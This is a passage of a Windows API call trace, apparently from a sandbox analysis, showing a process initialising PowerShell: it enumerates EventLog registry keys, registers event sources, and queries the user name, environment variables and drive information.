CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.847] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0xe7050, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.847] CoTaskMemFree (pv=0xe7050) [0063.847] CoTaskMemFree (pv=0x0) [0063.847] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.847] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0xe7050, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.847] CoTaskMemFree (pv=0xe7050) [0063.847] CoTaskMemFree (pv=0x0) [0063.847] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.847] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0xe7050, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.847] CoTaskMemFree (pv=0xe7050) [0063.847] CoTaskMemFree (pv=0x0) [0063.848] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x350) returned 0x0 [0063.848] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2 [0063.848] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x374) returned 0x0 [0063.848] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2 [0063.848] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x378) returned 0x0 [0063.848] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2 [0063.848] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x37c) returned 0x0 [0063.848] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2 [0063.848] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x380) returned 0x0 [0063.848] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2 [0063.848] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x384) returned 0x0 [0063.849] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2 [0063.849] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x5 [0063.857] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x388) returned 0x0 [0063.857] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2 [0063.857] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x38c) returned 0x0 [0063.857] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x390) returned 0x0 [0063.857] RegCloseKey (hKey=0x390) returned 0x0 [0063.857] RegCloseKey (hKey=0x370) returned 0x0 [0063.858] RegCloseKey (hKey=0x38c) returned 0x0 [0063.859] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d3d8 | out: phkResult=0x24d3d8*=0x38c) returned 0x0 [0063.859] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d34c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d348, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d34c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d348*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.860] CoTaskMemFree (pv=0x0) [0063.860] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.860] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0xe7050, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.860] CoTaskMemFree (pv=0xe7050) [0063.860] CoTaskMemFree (pv=0x0) [0063.860] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.860] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0xe7050, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.860] CoTaskMemFree (pv=0xe7050) [0063.860] CoTaskMemFree (pv=0x0) [0063.860] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.860] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0xe7050, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.860] CoTaskMemFree (pv=0xe7050) [0063.860] CoTaskMemFree (pv=0x0) [0063.860] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.860] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0xe7050, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.860] CoTaskMemFree (pv=0xe7050) [0063.860] CoTaskMemFree (pv=0x0) [0063.860] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.860] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0xe7050, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.860] CoTaskMemFree (pv=0xe7050) [0063.860] CoTaskMemFree (pv=0x0) [0063.860] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.860] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0xe7050, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.861] CoTaskMemFree (pv=0xe7050) [0063.861] CoTaskMemFree (pv=0x0) [0063.861] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.861] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0xe7050, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.861] CoTaskMemFree (pv=0xe7050) [0063.861] CoTaskMemFree (pv=0x0) [0063.861] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.861] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0xe7050, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.861] CoTaskMemFree (pv=0xe7050) [0063.861] CoTaskMemFree (pv=0x0) [0063.861] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0063.861] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0xe7050, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0063.861] CoTaskMemFree (pv=0xe7050) [0063.861] CoTaskMemFree (pv=0x0) [0063.861] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x370) returned 0x0 [0063.861] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2 [0063.861] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x390) returned 0x0 [0063.861] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2 [0063.861] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x394) returned 0x0 [0063.861] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2 [0063.862] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x398) returned 0x0 [0063.862] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2 [0063.862] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x39c) returned 0x0 [0063.862] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2 [0063.862] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x3a0) returned 0x0 [0063.862] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2 [0063.862] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x5 [0063.864] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x3a4) returned 0x0 [0063.864] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2 [0063.864] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x3a8) returned 0x0 [0063.864] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x3ac) returned 0x0 [0063.865] RegCloseKey (hKey=0x3ac) returned 0x0 [0063.865] RegCloseKey (hKey=0x38c) returned 0x0 [0063.865] RegCloseKey (hKey=0x3a8) returned 0x0 [0064.041] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba60008 [0064.043] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35ff850*="WSMan", lpRawData=0x35ff5c0) returned 1 [0064.047] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.049] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b990db0, nSize=0x24d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24d6c8) returned 0x1 [0064.049] GetUserNameW (in: lpBuffer=0xe7050, pcbBuffer=0x24d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24d708) returned 1 [0064.049] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3604d38*="Alias", lpRawData=0x3604ac8) returned 1 [0064.050] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.052] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b990db0, nSize=0x24d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24d6c8) returned 0x1 [0064.052] GetUserNameW (in: lpBuffer=0xe7050, pcbBuffer=0x24d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24d708) returned 1 [0064.052] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x360a2e0*="Environment", lpRawData=0x360a070) returned 1 [0064.053] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.053] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.053] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0064.053] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0064.054] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x24d270, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0064.054] SetErrorMode (uMode=0x1) returned 0x1 [0064.054] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x24d480 | out: lpFileInformation=0x24d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.054] SetErrorMode (uMode=0x1) returned 0x1 [0064.280] GetLogicalDrives () returned 0x4 [0064.283] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.284] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0064.284] SetErrorMode (uMode=0x1) returned 0x1 [0064.285] CoTaskMemAlloc (cb=0x68) returned 0x1b9645b0 [0064.285] CoTaskMemAlloc (cb=0x68) returned 0x1b964000 [0064.285] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b9645b0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24d450, lpMaximumComponentLength=0x24d44c, lpFileSystemFlags=0x24d448, lpFileSystemNameBuffer=0x1b964000, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24d450*=0x705ba84c, lpMaximumComponentLength=0x24d44c*=0xff, lpFileSystemFlags=0x24d448*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0064.285] CoTaskMemFree (pv=0x1b9645b0) [0064.285] CoTaskMemFree (pv=0x1b964000) [0064.285] SetErrorMode (uMode=0x1) returned 0x1 [0064.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0064.286] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.287] SetErrorMode (uMode=0x1) returned 0x1 [0064.287] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d3f0 | out: lpFileInformation=0x24d3f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.287] SetErrorMode (uMode=0x1) returned 0x1 [0064.287] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.287] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d040, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.287] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0064.287] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.287] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0064.288] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.288] SetErrorMode (uMode=0x1) returned 0x1 [0064.288] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d220 | out: lpFileInformation=0x24d220*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.288] SetErrorMode (uMode=0x1) returned 0x1 [0064.288] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.288] SetErrorMode (uMode=0x1) returned 0x1 [0064.288] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d220 | out: lpFileInformation=0x24d220*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.288] SetErrorMode (uMode=0x1) returned 0x1 [0064.288] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0064.288] SetErrorMode (uMode=0x1) returned 0x1 [0064.288] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d2c0 | out: lpFileInformation=0x24d2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0064.289] SetErrorMode (uMode=0x1) returned 0x1 [0064.289] CoTaskMemAlloc (cb=0x804) returned 0x1b990db0 [0064.289] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b990db0, nSize=0x24d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24d6c8) returned 0x1 [0064.289] CoTaskMemFree (pv=0x1b990db0) [0064.289] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0064.289] GetUserNameW (in: lpBuffer=0xe7050, pcbBuffer=0x24d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24d708) returned 1 [0064.289] CoTaskMemFree (pv=0xe7050) [0064.290] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3611338*="FileSystem", lpRawData=0x36110c8) returned 1 [0064.291] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.291] CoTaskMemFree (pv=0x1b96d1e0) [0064.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.293] CoTaskMemAlloc (cb=0x804) returned 0x1b990db0 [0064.293] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b990db0, nSize=0x24d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24d6c8) returned 0x1 [0064.293] CoTaskMemFree (pv=0x1b990db0) [0064.293] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0064.293] GetUserNameW (in: lpBuffer=0xe7050, pcbBuffer=0x24d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24d708) returned 1 [0064.293] CoTaskMemFree (pv=0xe7050) [0064.294] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3616b28*="Function", lpRawData=0x36168b8) returned 1 [0064.295] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0064.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.295] CoTaskMemFree (pv=0x1b96d1e0) [0064.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: 